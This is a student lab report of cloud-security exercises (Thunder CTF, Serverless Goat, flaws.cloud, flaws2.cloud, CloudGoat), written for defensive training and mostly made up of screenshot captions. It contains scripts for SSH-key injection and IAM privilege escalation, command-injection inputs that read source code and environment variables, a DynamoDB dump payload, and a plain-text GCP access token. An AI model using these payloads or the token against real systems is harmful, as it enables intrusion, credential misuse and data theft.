# **CS495 - Lab 4 Report**
#### *Author: Alexander DuPree*

---

# **4.1 - Thunder CTF**

The following screenshots show the completion of the Thunder CTF exercises. For each screen shot the secret key for each exercise will, generally, be highlighted in yellow Some sections will have accompnying python scripts as well. 

## **4.1.1 thunder/a1openbucket**

![a1openbucket](../images/a1openbucket.png)

## **4.1.2 thunder/a2finance**

![a2finance](../images/a2finance.png)

## **4.1.3 thunder/a3password**

![a3](../images/a3password.png)

## **4.1.4 thunder/a4error**

Script to add the ssh key to the metadata for the compute instance. 
```python
import json
import requests

url = 'https://www.googleapis.com/compute/v1/projects/cs495-alexander-dupree/zones/us-west1-b/instances/a4-instance/setMetadata'

access_token = ''

a4_key = ''

fingerprint = ''

headers = {
    'Authorization' : f'Bearer {access_token}',
    'Accept' : 'application/json',
    'Content-TYpe' : 'application/json'
}

data = {
    "fingerprint" : f"{fingerprint}",
    "items" : [{
        "key" : "ssh-keys",
        "value" : f"ubuntu:{a4_key} ubuntu"
    }]
}

resp = requests.post(url, data=json.dumps(data), headers=headers)
print(resp.text)
```

![a4](../images/a4error.png)

## **4.1.5 thunder/a5power**

Script to get the IAM policy
```python
import json
import requests

url = 'https://cloudresourcemanager.googleapis.com/v1/projects/cs495-alexander-dupree:getIamPolicy'

access_token = 'ya29.c.KqUBvwc3Q4exEL7SGMO2u260mjSWXnrZDzbxubHl4CU17LCAVhXW-44ThtdZXkFcPSVV1PeFhNlvj25y_j0tUYWxTsebJLhfhe3bSWMxKcV04Gz3TZ34YFTzfhgWehdndojCQaaMiTARlIGgckxxi2litg-bb7P_KwqMDkpXCI1yyg2XOyeJE80XqzOMLZR5-sGagftIEF8amXOLK9OnxrgczcsZ3sNg'

headers = {
    'Authorization' : f'Bearer {access_token}',
    'Accept' : 'application/json',
    'Content-TYpe' : 'application/json'
}

data = {}

resp = requests.post(url, data=json.dumps(data), headers=headers)
print(resp.text)
```

Script to update the permissions for the a5_access_role
```python
import json
import requests

url = 'https://iam.googleapis.com/v1/projects/cs495-alexander-dupree/roles/a5_access_role_588018255234?updateMask=includedPermissions'

access_token = 'ya29.c.KqUBvwc3Q4exEL7SGMO2u260mjSWXnrZDzbxubHl4CU17LCAVhXW-44ThtdZXkFcPSVV1PeFhNlvj25y_j0tUYWxTsebJLhfhe3bSWMxKcV04Gz3TZ34YFTzfhgWehdndojCQaaMiTARlIGgckxxi2litg-bb7P_KwqMDkpXCI1yyg2XOyeJE80XqzOMLZR5-sGagftIEF8amXOLK9OnxrgczcsZ3sNg'

headers = {
    'Authorization' : f'Bearer {access_token}',
    'Accept' : 'application/json',
    'Content-Type' : 'application/json'
}

data = {
    "includedPermissions" : [
        "storage.objects.get",
        "storage.objects.list",
        "storage.buckets.get",
        "storage.buckets.list"
    ]
}

resp = requests.patch(url, data=json.dumps(data), headers=headers)
print(resp.text)
```

![a5](../images/a5power.png)

## **4.1.6 thunder/a6container.png**

![a6](../images/a6container.png)

---

# **4.2 AWS Serverless Goat**

Region of the AWS Lambda endpoint

![aws-serverless](../images/aws-serverless-goat-region.png)


Converting a document on the web application will initiate a GET request. The server responsds with a `302`, to redirect us to the converted document with the location of the 
redirect in the reponse header. 
![aws-serverless](../images/aws-serverless-goat1.png)


The response headers also expose AWS-specific information. This information is highlighted in yellow in the screenshot below. 
![aws-serverless](../images/aws-serverless-goat2.png)

Submitting the empty string to the web application causes it to throw an error. 
![aws-serverless](../images/aws-serverless-goat-error.png)

From this error we can deduce that the AWS Lambda run-time is `Node.js`. To prevent this type of information gathering the web application should never expose exception or error messages to the client as well as properly handle these exception cases. Furthermore, because the URL 
of the endpoint is exposed we can see and modify the parameter that is being used by the application. Removing the parameter altogether we can generate another error message. 
![aws-serverless](../images/aws-serverless-goat-error2.png)

This `TypeError` reveals that the file that is being executed is  `/var/task/index.js`. Furthermore, the call stack reveals that at line 9 log is calling exports.handler which 
encounter the unhandled `TypeError` at line 25. 

To assist in data validation, the lambda endpoint to enable the request validation feature for AWS API Gateway. 
![aws-serverless](../images/aws-serverless-goat-validate.png)

Since the web app does not sanitize input and evaluates it directly we can perform command injection. The following is the result of entering `http://.com;pwd`.

![aws-serverless](../images/aws-serverless-goat3.png)


Submitting `http://.com;ls -a`

![aws-serverless](../images/aws-serverless-goat4.png)

Timing out the lambda function with `http://.com;sleep 100000000000000000`
![aws-serverless](../images/aws-serverless-goat6.png)


Displaying the source code with `http://.com;cat index.js`
![aws-serverless](../images/aws-serverless-goat5.png)

Prettifying and examining the source code we can gain better insights about the command injection vulnerability.

The line `let txt = child_process.execSync(...)` is where the command is injected. 
![aws-serverless-src](../images/aws-serverless-src.png)


This script uses three packages, `child_process` to fork and run the 
catdoc command, `aws-sdk` for using the AWS api, and `node-uuid` to generate
globally unique identifiers for the keys. 

![aws-serverless-src](../images/aws-serverless-src-imports.png)

The code that writes to the s3 bucket is displayed below. We can also see in 
the highlighted section that the name of the bucket is retrieved from the 
process environment variables. 

![aws-serverless-src](../images/aws-serverless-src-bucket.png)

The section of code below also reveals what database is being used, `Dynamo DB` in this case, as well as what information is being stored on each event. The `requestid`, 
`ip address`, and `document URL` are all being stored in the DB. Also, the database 
table name is being retrieved form the process environment variable. 

![aws-serverless-src](../images/aws-serverless-src-db.png)

Using command injection to dump the contents of `package.json` we reveal that the source depends on the `node-uuid` version `1.4.3` which has a insecure randomness vulnerbility. Because the applicaiton uses this package to generate 'unique' keys 
for the bucket id's we can use the insecure and predictable random library to reverse engineer id's or map different files to the same bucket id. 

![aws-serverless-src](../images/aws-serverless-vuln.png)

Since we know that the applicaiton is using environment variables to retrieve the 
table/bucket names we can use command injection and `printenv` to retrieve that data. 
![aws-serverless-src](../images/aws-serverless-env.png)

Now that we know the bucket name, we can access it via URL and reveal its contents. 
![aws-serverless-src](../images/aws-serverless-bucket2.png)

This reveals all the keys of the documents that have been converted and can be retrieved directly. The document below was retrieved at the URL `https://serverlessrepo-serverless-goat-bucket-gb5jt6qngn8e.s3.amazonaws.com/db95864c-76df-4429-add7-013521632c69`

![aws-serverless-src](../images/aws-serverless-doc.png)
 
Using the AWS access key and session token stolen from the environment variables we 
can assume a privileged identity. 

![aws-serverless-src](../images/aws-serverless-hackme.png)

With these credentials we can list the objects in the applications s3 bucket. 

![aws-serverless-src](../images/aws-serverless-bucket3.png)

Examining our roles access level with regards to s3 buckets reveals that we have `List`, `Read`, `Write`, and `Permissions Management`. We are definiely overprivileged for this role, and `Permissions Management` should not be 
accessible. 

Using these permissions we can exfiltrate the entire table of URLs converted and ip 
addresses with the following command injection:

```bash
https://; node -e 'const AWS = require("aws-sdk"); (async () => {console.log(await new AWS.DynamoDB.DocumentClient().scan({TableName: process.env.TABLE_NAME}).promise());})();'
```
And retrieve the following:

![aws-serverless-src](../images/aws-serverless-dump.png)

# **4.3 flaws.cloud**

## **Level 1**

The hosted bucket is located in region `us-west-2`.
![flaws.cloud](../images/flaws-level1-region.png)

Accessing `flaws.cloud` via bucket URL: `http://flaws.cloud.s3-website-us-west-2.amazonaws.com/`
![flaws.cloud](../images/flaws-level1-url.png)

Accessing buckets manifest via URL: `http://flaws.cloud.s3.amazonaws.com/`
![flaws.cloud](../images/flaws-level1-manifest.png)

Retrieving secret file and link to level 2
![flaws.cloud](../images/flaws-level1-secret.png)

## **Level 2**

Attempting to list the s3 buckets contents
![flaws.cloud](../images/flaws-level2-denied.png)

Listing bucket contents via authenticated aws account
![flaws.cloud](../images/flaws-level2-bucket.png)

Retrieving secret and link to level 3
![flaws.cloud](../images/flaws-level2-secret.png)

## **Level 3**

Displaying contents of robots.txt from the levels s3 bucket 
![flaws.cloud](../images/flaws-level3-robots.png)

Using the access keys stolen from the git history we can list the buckets for the other levels. 
![flaws.cloud](../images/flaws-level3-ls.png)

However, jumping ahead to level 6 is denied.
![flaws.cloud](../images/flaws-level3-denied.png)

## **Level 4**

Getting the number of publicly available ec2 snapshots
![flaws.cloud](../images/flaws-level4-snapshots.png)

Clone exposed snapshot to us-east-1 region
![flaws.cloud](../images/flaws-level4-cloned.png)

Authenticated with credentials found in ec2 snapshot backup
![flaws.cloud](../images/flaws-level4-access.png)

## **Level 5**

Visiting summit route blog feed via the https proxy 
![flaws.cloud](../images/flaws-level5-proxy.png)

Accessing level 6 with the stolen credentials retrieved by proxying the metadata server
![flaws.cloud](../images/flaws-level5-access.png)

## **Level 6**

![flaws.cloud](../images/flaws-level6-theend.png)

# **4.3 flaws2.cloud**

## **Attacker: Level 1**

Identity of AWS account being used
![flaws2.cloud](../images/flaws2-level1-sts.png)

Retrieval of level2 link
![flaws2.cloud](../images/flaws2-level1-secret.png)

## **Attacker: Level 2**

Retrieval of level3 link
![flaws2.cloud](../images/flaws2-level2-access.png)

## **Attacker: Level 3**
The container proxy function is vulnerable to local file include attacks
![flaws2.cloud](../images/flaws2-level3-passwd.png)

Retrieving environment variables for the process running the container
![flaws2.cloud](../images/flaws2-level3-environ.png)

Proxying container metadata to retrieve AWS credentials
![flaws2.cloud](../images/flaws2-level3-metadata.png)

Finishing attacker path for flaws2.cloud
![flaws2.cloud](../images/flaws2-level3-end.png)

## **Defender: Objective 1**

Caller identity of the provided security credentials
![flaws2.cloud](../images/flaws2-obj1-identity.png)

Issued short-term token with STS
![flaws2.cloud](../images/flaws2-obj1-token.png)

Download the AWS logs locally
![flaws2.cloud](../images/flaws2-obj1-logs.png)

## **Defender: Objective 2**

Associated roles for security and target_security profiles
![flaws2.cloud](../images/flaws2-obj2-identity.png)

Buckets of target account
![flaws2.cloud](../images/flaws2-obj2-buckets.png)

## **Defender: Objective 3**

Examining the logs reveals that the likely ip address for the attack is `104.102.221.250`
![flaws2.cloud](../images/flaws2-obj3-ip.png)

## **Defender: Objective 4**

The event associated with the theft of credentials occured from ip `104.102.221.250` and was initiated from the `aws cli` client. 
![flaws2.cloud](../images/flaws2-obj4-event.png)

Examining the policy for the role it appears the service this role is meant to be used
with is to `Allows ECS tasks to call AWS services on your behalf`. 
![flaws2.cloud](../images/flaws2-obj4-role.png)

## **Defender: Objective 5**
Examining the policy for the level2 repo reveals that the `Principal` is set to `*` and the `Effect` is `Allow`. Which means that the everyone is allowed to perform the specified actions. I.E. the ECR is public. 
![flaws2.cloud](../images/flaws2-obj5-policy.png)

## **Defender: Objective 6**
Results of query `select eventtime, eventname from cloudtrail;`.
![flaws2.cloud](../images/flaws2-obj6-query.png)

Getting the count of each event in the logs
![flaws2.cloud](../images/flaws2-obj6-query2.png)

# **4.5 CloudGoat**

## **iam_privesec_by_rollback**

![aws-iam-privesec](../images/aws-iam-privesec.png)
![aws-iam-privesec](../images/aws-iam-privesec1.png)
![aws-iam-privesec](../images/aws-iam-privesec2.png)
![aws-iam-privesec](../images/aws-iam-privesec3.png)

## **cloud_breach_s3**
![cloud_breach_s3](../images/aws-cloud-breach1.png)
![cloud_breach_s3](../images/aws-cloud-breach2.png)
![cloud_breach_s3](../images/aws-cloud-breach3.png)
![cloud_breach_s3](../images/aws-cloud-breach4.png)
![cloud_breach_s3](../images/aws-cloud-breach5.png)

## **ec2_ssrf**

Attempting to invoke AWS lambda with Solus profile
![ec2-ssrf](../images/aws-ec2-ssrf1.png)

Accessing ec2 instance public IP with URL parameter 
![ec2-ssrf](../images/aws-ec2-ssrf2.png)

Invoking the protected lambda with stolen shepherd credentials
![ec2-ssrf](../images/aws-ec2-ssrf3.png)

